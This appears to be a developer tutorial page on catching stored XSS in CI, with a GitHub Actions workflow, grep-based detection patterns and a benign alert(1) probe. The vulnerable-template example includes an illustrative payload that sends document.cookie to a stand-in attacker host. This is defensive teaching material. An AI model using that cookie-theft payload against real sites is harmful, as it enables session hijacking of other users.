HTML-Encode User Content in Automated Security Scanning Workflows
Detect and prevent XSS vulnerabilities by automating HTML entity encoding validation in your GitHub Actions security pipeline. Includes YAML workflow with grep-based XSS pattern detection.
The Problem
Your application renders user-provided content in HTML templates. A developer added a new feature and forgot to escape a field — now there's a stored XSS vulnerability in your codebase. You caught it in a security audit three months later. You need automated detection in CI.
Why This Matters
XSS (Cross-Site Scripting) consistently appears in the OWASP Top 10. Stored XSS lets attackers inject malicious scripts that run in other users' browsers — stealing cookies, impersonating users, or redirecting to phishing pages. Catching it in CI takes seconds and costs nothing. Finding it in a penetration test costs $10,000+. Finding it after a breach costs millions.
Step-by-Step Instructions
Test HTML encoding with the tool below
Paste sample user-generated content into the HTML encoder. Verify that <, >, &, ", and ' are properly encoded. Use these encoded values as expected outputs in your security tests.
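The expected outputs for these tests can also be generated programmatically. A minimal sketch using Python's standard-library html.escape, which encodes all five characters when quote=True (the default):

```python
import html

# The five characters that must be encoded in HTML text content,
# mapped to the entities html.escape produces for them.
expected = {
    "<": "&lt;",
    ">": "&gt;",
    "&": "&amp;",
    '"': "&quot;",
    "'": "&#x27;",
}

for raw, entity in expected.items():
    assert html.escape(raw) == entity

# A full probe string, usable as an expected value in a security test:
print(html.escape("<script>alert(1)</script>"))
# → &lt;script&gt;alert(1)&lt;/script&gt;
```

Note that html.escape encodes the single quote as the numeric entity &#x27; rather than &apos;; match on whichever form your template engine emits.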
Add a pattern-based XSS scan to your workflow
Use grep -rn to scan your templates for patterns that indicate unescaped output. In Jinja2, {{ variable }} auto-escapes and is safe; alert on {{ variable | safe }}, which bypasses escaping. In React, flag dangerouslySetInnerHTML.
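If you prefer a scriptable checker over raw grep, the same patterns can be matched in a few lines of Python. A minimal sketch — the pattern names, file globs, and directory layout are illustrative, not prescriptive:

```python
import re
from pathlib import Path

# Patterns that indicate escaping may be bypassed.
UNSAFE_PATTERNS = {
    "jinja2_safe": re.compile(r"\{\{[^}]*\|\s*safe\s*\}\}"),
    "innerHTML": re.compile(r"\.innerHTML\s*="),
    "react_dangerous": re.compile(r"dangerouslySetInnerHTML"),
}

def scan(root, globs=("*.html", "*.js", "*.jsx", "*.tsx")):
    """Yield (file, line_no, pattern_name, line) for each suspicious line."""
    for glob in globs:
        for path in Path(root).rglob(glob):
            for no, line in enumerate(
                path.read_text(errors="ignore").splitlines(), 1
            ):
                for name, rx in UNSAFE_PATTERNS.items():
                    if rx.search(line):
                        yield (str(path), no, name, line.strip())
```

A scripted scanner is easier to extend than a grep pipeline when you later want per-pattern severities or an allowlist of reviewed files.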
Run a dynamic XSS probe with a known payload
In your integration test suite, submit the classic XSS probe string <script>alert(1)</script> as user input and verify it appears encoded in the HTML response. Any unencoded output is a vulnerability.
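The pass/fail logic of that probe can be isolated into a small helper that inspects the fetched page body. A sketch — classify_response and the payload constants are hypothetical names, and the encoded form is computed with the standard-library html.escape:

```python
import html

PAYLOAD = "<script>alert(1)</script>"
ENCODED = html.escape(PAYLOAD)  # '&lt;script&gt;alert(1)&lt;/script&gt;'

def classify_response(page: str) -> str:
    """Classify a rendered page against the XSS probe.

    'vulnerable' – the raw payload appears verbatim (the script would execute)
    'safe'       – only the HTML-encoded form appears
    'unverified' – neither form appears; the probe may not have reached the page
    """
    if PAYLOAD in page:
        return "vulnerable"
    if ENCODED in page:
        return "safe"
    return "unverified"
```

The raw check must come first: a page containing the raw payload is vulnerable even if an encoded copy also appears elsewhere. Treat 'unverified' as a failure to investigate, not a pass.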
Block PRs that introduce unsafe HTML patterns
Fail the CI check when new | safe filters or innerHTML assignments are introduced. Require explicit security review annotation (e.g., a comment # security: reviewed XSS safe) to bypass the check.
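One way to honor that annotation is to suppress a finding when the marker appears on the flagged line or the line directly above it. A minimal sketch of that convention — requires_review is a hypothetical helper, and you would adapt the comment syntax per language (e.g. {# ... #} in Jinja2 templates):

```python
import re

REVIEW_MARK = "security: reviewed XSS safe"

# Unsafe patterns: Jinja2 `| safe`, innerHTML assignment, React escape hatch.
UNSAFE = re.compile(r"\|\s*safe|\.innerHTML\s*=|dangerouslySetInnerHTML")

def requires_review(line: str, previous_line: str = "") -> bool:
    """True if a line matches an unsafe pattern and carries no review
    annotation on the same line or the line directly above it."""
    if not UNSAFE.search(line):
        return False
    return REVIEW_MARK not in line and REVIEW_MARK not in previous_line
```

CI would then fail only when requires_review is true for a newly added line, so deliberate, reviewed uses of raw HTML pass while unreviewed ones block the PR.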
Try It Now — HTML Entity Encoder
All processing happens in your browser — no data is sent to any server.
Before & After Example
<!-- Jinja2 template — VULNERABLE -->
<div class="comment">
{{ comment.text | safe }} {# ← XSS vulnerability! #}
</div>
<!-- User input that exploits this: -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
<!-- Result: browser executes attacker's JavaScript -->
name: Security Scan — XSS Detection
on: [push, pull_request]

jobs:
  xss-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Scan templates for unsafe HTML patterns
        id: template_scan
        run: |
          echo "Scanning for potentially unsafe HTML patterns..."
          # Flag | safe filters in Jinja2 (bypass auto-escaping)
          UNSAFE=$(grep -rn '| safe' app/templates/ --include='*.html' || true)
          # Flag innerHTML assignments in JavaScript
          INNER_HTML=$(grep -rn '\.innerHTML\s*=' app/static/js/ --include='*.js' || true)
          # Flag dangerouslySetInnerHTML in React
          DANGEROUS=$(grep -rn 'dangerouslySetInnerHTML' src/ --include='*.jsx' --include='*.tsx' 2>/dev/null || true)
          if [ -n "$UNSAFE" ] || [ -n "$INNER_HTML" ] || [ -n "$DANGEROUS" ]; then
            echo "⚠️ Potentially unsafe HTML patterns detected:"
            [ -n "$UNSAFE" ] && echo "--- Jinja2 | safe filters ---" && echo "$UNSAFE"
            [ -n "$INNER_HTML" ] && echo "--- innerHTML assignments ---" && echo "$INNER_HTML"
            [ -n "$DANGEROUS" ] && echo "--- dangerouslySetInnerHTML ---" && echo "$DANGEROUS"
            echo ""
            echo "Review each occurrence. Add '# security: reviewed XSS safe' comment if intentional."
            echo "unsafe_found=true" >> "$GITHUB_OUTPUT"
          else
            echo "✓ No unsafe HTML patterns found"
            echo "unsafe_found=false" >> "$GITHUB_OUTPUT"
          fi

      - name: Start test server
        run: .venv/bin/uvicorn app.main:app --host 0.0.0.0 --port 8000 &
        timeout-minutes: 1

      - name: Run dynamic XSS probe
        run: |
          # Wait for the server to start
          sleep 2
          XSS_PAYLOAD='<script>alert(1)</script>'
          ENCODED_PAYLOAD='&lt;script&gt;alert(1)&lt;/script&gt;'
          # Submit the XSS payload as a comment
          curl -s -X POST http://localhost:8000/api/comments \
            -H 'Content-Type: application/json' \
            -d "{\"text\": \"$XSS_PAYLOAD\"}" > /dev/null
          # Fetch the page that renders comments
          PAGE=$(curl -s http://localhost:8000/comments/)
          if echo "$PAGE" | grep -qF "$XSS_PAYLOAD"; then
            echo "❌ XSS VULNERABILITY DETECTED: raw script tag found in response"
            exit 1
          elif echo "$PAGE" | grep -qF "$ENCODED_PAYLOAD"; then
            echo "✓ XSS safe: payload was properly HTML-encoded"
          else
            echo "⚠️ Could not verify XSS encoding — manual review required"
          fi

      - name: Fail on unsafe patterns (require review)
        if: steps.template_scan.outputs.unsafe_found == 'true'
        run: |
          echo "CI blocked: unsafe HTML patterns require security review"
          exit 1
Frequently Asked Questions
Does Jinja2 auto-escape HTML by default?
Flask enables Jinja2 auto-escaping for .html, .htm, .xml, and .xhtml templates, and Starlette's Jinja2Templates (which FastAPI uses) enables it by default. The {{ var }} syntax is safe. The {{ var | safe }} filter bypasses escaping and should be used only for trusted, pre-sanitized HTML.
What's the difference between HTML encoding and sanitization?
Encoding converts special characters to entities (< becomes &lt;) — safe for text content, but any markup the user typed is displayed literally rather than rendered. Sanitization (e.g., via DOMPurify or bleach) allows some HTML tags (bold, links) while blocking dangerous ones (script, onerror). Use encoding for plain-text fields and sanitization for rich-text editors.
Can I use semgrep for more comprehensive XSS detection?
Yes. semgrep --config=p/xss has rules for Jinja2, React, Angular, and Django XSS patterns. It's free for open source and available as a GitHub Action (returntocorp/semgrep-action). Add it alongside grep-based checks for defense in depth.
Want the full HTML Entity Encoder experience?
Open the standalone tool for more space, keyboard shortcuts, and additional features.
Open HTML Entity Encoder →